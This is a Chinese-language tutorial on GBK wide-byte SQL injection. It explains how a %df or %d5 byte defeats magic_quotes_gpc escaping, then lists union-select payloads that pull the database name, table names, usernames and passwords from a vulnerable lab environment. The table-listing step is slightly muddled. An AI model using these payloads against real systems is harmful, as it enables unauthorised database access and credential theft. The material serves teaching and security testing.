sql宽字节注入

admin

注入原理
在`magic_quotes_gpc=On`的情况下，提交的参数中如果带有单引号`’`，就会被自动转义`\’`，使很多注入攻击无效，

**GBK双字节编码：**一个汉字用两个字节表示，首字节对应`0×81-0xFE`，尾字节对应`0×40-0xFE`（除0×7F），刚好涵盖了转义符号\对应的编码0×5C。

`0xD50×5C` 对应了汉字“`诚`”，URL编码用百分号加字符的16进制编码表示字符，于是 `%d5%5c` 经URL解码后为“`诚`”。
下面分析攻击过程：

`/test.php?username=test%d5′%20or%201=1%23&pwd=test`

经过浏览器编码，username参数值为(单引号的编码0×27)

`username=test%d5%27%20or%201=1%23`

经过php的url解码

`username=test 0xd5 0×27 0×20 or 0×20 1=1 0×23` (为了便于阅读，在字符串与16进制编码之间加了空格)

经过PHP的GPC自动转义变成(单引号0×27被转义成\’对应的编码0×5c0×27)：

`username=test 0xd5 0×5c 0×27 0×20 or 0×20 1=1 0×23`

因为在数据库初始化连接的时候SET NAMES ‘gbk’，0xd50×5c解码后为诚，0×27解码为’，0×20为空格，0×23为mysql的注释符#

上面的SQL语句最终为：` SELECT * FROM user WHERE username=’test诚’ or 1=1#’ and password=’test’;`

注释符#后面的字符串已经无效，等价于

`SELECT * FROM user WHERE username=’test诚’ or 1=1;`

条件变成永真，成功注入。

**补充：**

0xD50×5C不是唯一可以绕过单引号转义的字符，0×81-0xFE开头+0×5C的字符应该都可以。
手工注入
开启漏洞环境，并用burp抓包


爆出数据库
[pre]
%df' union select 1,database() %23
[/pre]


爆出表
[pre]
%df' union select 1,group_concat(table_name) from information_schema.columns where table_schema=database()  %23
[/pre]


注意：这里列出了四个users表，意味着该表下面有四个字段




爆出数据

查用户
[pre]
%df' union select 1,username  from users where 1=1 limit 0,1 %23
[/pre]

查密码
[pre]
%df' union select 1, password from users where 1=1 limit 0,1 %23
[/pre]